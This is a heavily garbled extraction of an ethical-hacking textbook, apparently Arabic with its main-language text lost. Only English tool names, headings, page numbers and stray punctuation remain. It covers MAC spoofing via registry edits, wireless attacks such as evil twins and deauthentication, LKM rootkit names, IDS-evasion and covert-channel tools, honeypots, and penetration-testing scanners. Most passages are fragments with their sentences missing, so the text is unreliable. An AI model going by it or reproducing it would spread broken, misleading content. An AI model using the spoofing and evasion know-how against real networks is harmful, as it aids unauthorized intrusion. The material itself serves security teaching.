HKEY_LOCAL_MACHINE > System > CurrentControlSet > Control > Class > {4D36E972-E325-11CE-BFC1-08002bE10318}
find the numbered subkey of the adapter (its DriverDesc names it), choose Edit, New, String Value, name it NetworkAddress, choose Modify and enter the new MAC address (12 hex digits), click OK, then disable and re-enable the adapter. SMAC does the same MAC spoofing from a GUI.
ClassicStumbler scans for access points.
AirFart monitors wireless traffic.
Hotspotter impersonates the hotspots that clients probe for.
ASLEAP cracks Cisco LEAP authentication. Also: AP Radar, Cain & Abel.
Wireless attacks:
Cracking the encryption: WEP, WPA-PSK or LEAP keys recovered from captured traffic.
Rogue hotspots: an attacker's access point with the SSID of a public hotspot.
DoS: flooding the access point or the channel; forged deauthentication (death) frames at the LLC layer disconnect every client.
AP masquerading (spoofing): an "evil twin" access point with the victim network's SSID lures clients to associate with it.
MAC spoofing: copying an allowed station's MAC address defeats MAC filtering.
Man-in-the-middle: the attacker's access point relays to the real one and reads or modifies everything that passes.
185
NetStumbler .
kismet NetStumbler
. Access
point SSID ... . monitor mode
Airodump capture Airodump . SSID
capture . Aircrack
. WEP
WireShark
POP FTP Telnet.
186
:
AP Scanner StumbVerter WaveStumbler Mognet MacStumbler PrismStumbler Kismet
Wifi Finder AirTraf Wireless Security Auditor .eEye Retina WIFI
:
EtherPEG vxSniffer Aerosol VPNmonitoral WireShark NAI Wireless Sniffer AiroPeek
.ssidsniff WinDump DriftNet
. OSI .
187
2 :
WPA
WPA2
802.11i
3 :
7 :
SSID :SSID .
: .
Access point .
DHCP IP .
access point .
access point .
Firmware .
.SSL
access point IP .
VPN .
188
IT
.
IDS .
" " .
tape keylogger
access point .
) (.
.
.
.
.
.
190
.
.
:
access point
) (
:
:
. CCTV
. . tape
.
) (lock .
. ...
: IDS spyware
.
191
:
.
) (
.
.
. :
192
.
.
.
:
o
o
o
.
193
: .
.
:
:
o ...
o
o
o
194
: .
:
o
o
o ) (boot floppy CD-ROM
o DOS DOS
.
: .
. :
o
o
o
o
195
:
:
o ) (auto answer
o
196
: .
:
o
o
o
o
: .
wiretap : .
.
) (shielded .
197
:
.
.
.
.
:
. (www.sentryinc.com) CyberAngel (www.ztrace.com) Ztrace Gold :
.(www.computrace.com) ComputracePlus .
: :
GPS . ...
.
198
:DeviceLock
.
199
. distribution .
.
Mandrake RedHat Debian SUSE Gentoo Knoppix.
.
.
.
. .
jove pico ex vi .GNU emacs
vi .
emacs .
GNU
. GNU BSD
. GNU BSD .
. )(job control
201
.
MS-DOS.
. . C
) (csh C . (sh) classic Bourne .
.
GNU Bash Bash ) job
(control .
tcsh C . small Bourne zsh
BSD's ash ksh likne shel .rc
256
:rm file
:ls dir
:pwd
:arp IP
:ifconfig
:netstat
:nslookup IP
:ping
:w session
:ps
:route
:shred overwrite
:traceroute
:adduser user1
:passwd user1 user1
203
:
:bin )(
:sbin ) (
:etc
:include include
:lib
:src
:doc
:man ) manual(
:share
.
.
.
.
CD .
.
.
backdoor . .
ftp.kernel.org
:
.1 /usr/src
. tar zxf .
.2 . /usr/src/Linux make
menuconfig .
. menu .
make dep; make clean .
204
.
. clean
.
.3 make zImage make modules
.
.4 . /boot
:
cp /usr/src/linux/arch/i386/boot/zImage /boot/newkernel
.5 make modules_install . /lib/modules
.
.6 /etc/lilo.conf :
image = /boot/newkernel
label = new
read-only
.7 lilo .
lilo.conf .
Linux live CD . CD
.
CD live www.distrowatch.com
CD . CD .
205
GCC
GCC ) (command-line .
http://gcc.gnu.org . C++ C
.
C++ GCC :
g++ filename.cpp -o outputfilename.out
C GCC :
gcc filename.c -o outputfilename.out
) (LKM
. LKM rootkit LKM
. LKM .
LKM rootkit Adore Knark : .Rtkit
rootkit . LKM /tmp
/var/tmp
. LKM rootkit
. LKM modprobe LKM.
.
:
fileutils fetchmail (many) exim evolution ethereal (many) cvs cups Cron
206
kernel kerberos KDE iproute inetd hylafax gzip gnupg glibc ghostscript Gdm
openssh MYSQL mutt mplayer mpg123 mozilla man mailman lynx lsh Lprng
openssl
sendmail screen samba rsync python proftpd PostgreSQL postfix PHP pine Perl
xpdf xinetd XFree86 xchat wu-ftpd wget webmin vim tcpdump sudo stunnel snort
zlib
IP
. 65535 TCP
UDP (131070)
.
Nmap .
.
:Nessus
.
Nessus .
Xcrack
.
.
.
207
) (hardening .
.
.
.
.
null /etc/shadow .
deny all
. deny all .
deny all .
:
echo "ALL: ALL" >> /etc/hosts.deny
/proc filesystem /etc/sysctl.conf .
patch .
.
208
IP tables
)(HIDS
)(IPTable
IPTable ipchains .
stateful . :
iptables -A INPUT -s 0/0 -i eth0 -d 192.168.1.1 -p tcp -j ACCEPT
eth0 IP
IP 192.168.1.1 .
iptables -A OUTPUT -p icmp --icmp-type echo-request -j ACCEPT
(ping) ICMP echo-request
ICMP .
(Security Auditors Research Assistant) SARA
. MAC OS.
Tcpdump .
ping .
Snort .
syslog .
209
Netcat
TCP UDP .
.
SAINT SATAN .
) (check ) ( .
:Wireshark
.
:
Hunt LIDS IPTraf LSOF Nemesis Sniffit Hping2 Abacus Port Sentry . ...
210
IDS honeypot
) (IDS honeypot
. ) (IDS
.
honeypot
.
.
signature
. IDSpacket sniffer
. event IDS pager
.
) (IPS ... .
IPS .
) (IDS :
:Host-based ) (HIDS
. agent Norton Internet Security Cisco Security .
: worm HIDS .
212
:Network-based ) (NIDS
.
.
malware . . IDS
.
IDS
Snort HIDS
. Snort IDS snort.conf .
snort :
snort -l c:\snort\log -c C:\snort\etc\snort.conf -A console
BlackICE
. ) ( .
IDS .RealSecure Lucent RealSecure eTrust Internet Defense Dragon Sensor :
213
IDS signature
. UDP TCP HTTP ICMP
. IDS
. session splicing .
.
IDS :
IP
) (
214
) IP IP (
IDS
) (pattern matching
.
IDS .
ADMutate .
signature IDS .
Fragrouter Stick Mendax SideStep : .Anzen NIDSbench
.
) (perimeter ) ( .
.
215
rule
.
performance . packet filtering .
telnet
217
80
HTTP
.
covert ICMP
. covert TCP
) (acknowledgment.
007 Shell shell-tunneling covert
.
ICMP Shell Telnet ICMP
) ( .
AckCmd / TCP ACK
.
Covert_TCP
IP .
Traffic IQ Professional
.
:
Application layer firewalls
Intrusion Detection Systems
Intrusion Prevention Systems
Routers and Switches
218
TCPOpera IDS .
Firewall Informer
. BLADE
) SAFE (
.
Atelier Web Firewall Tester
. 6 HTTP
.
Honeypot
honeypot DMZ
Honeypot .
IP .
. honeypot
DMZ . honeypot
.
219
honeypot
Honeypot )(Medium-interaction
:honeypot
False positive
false negative
IPv6
honeypot ) (high-interaction
honeypot
Honeypot DMZ .
. honeypot
220
honeypot anti-honeypot
honeypot .
honeypot .
anti-honeypot honeypot honeyd ...
.
KFSensor
NetBait
ManTrap
Specter
Bubblegum
Jackpot
BackOfficer Friendly
Bait-n-Switch
Bigeye
HoneyWeb
Deception Toolkit
LaBrea Tarpit
Honeyd
221
Honeynets
Sendmail SPAM Trap
Tiny Honeypot
Specter honeypot
.
Honeyd honeypot
.
KFSensor HIDS honeypot
.
Sebek honeypot .
Honeypot
Honeypot IP high-
interaction .
Honeypot . honeypot
. honeypot
IP honeypot .
Send-Safe Honeypot Hunter honeypot honeypot .
Nessus Vulnerability Scanner honeypot .
222
.
) (clear text ) (cipher text .
.
. .
.
.
. .
) substitution
( ) transposition ( .
substitution transposition . .
224
.
.
.
.
:
.
.
.
.
.
225
SSH
SSH .
telnet SSH2 . SSH SFTP.
226
40 . 56
. 64
. 128 .
256 .
PGP ... .
.
PGP Crack brute force PGP.
Magic Lantern .
keylogger
.
228
.
:
.
) (Pen tester
.
Pen tester .
.
.
IP
.
.
.
. .
.
230
: .
.
.
.
.
outsource .
.
. 10 DMZ .
SLA .
.
.
.
.
)(pre-attack
)(attack
)(post-attack
231
. .
DNS Whois
) ( .
IP Whois
.
...
. :
. ) (exploitive )(responsive
. .
:
) :(perimeter ) (ACL
FTP SSH Telnet . buffer
232
:Output Sanitization .
:Access Control
...
:Component Checking
.
:Confidentiality Check
.
:Session Management
SSL SSL history cache .
: .
CORE IMPACT
. brute-force
.
:
.
administrator .
233
: .
. ) (leaving a mark
.
.
.
.
.
.
.
:
) (NDA
2006
:
:Nessus 11000 .
/ GTK
.
234
:GFI LANguard .
IP .
patch
... .
:Retina . Nessus
.
:CORE IMPACT
) ( .
.
:ISS Internet Scanner .
1300
... .
:X-Scan .
username .
:SARA SATAN .
.
:QualysGuard .
. 5000 .
:SAINT .
235
:MBSA MBSA.
3 .
:
:Metasploit Framework .
:Canvas 150 .
. :
236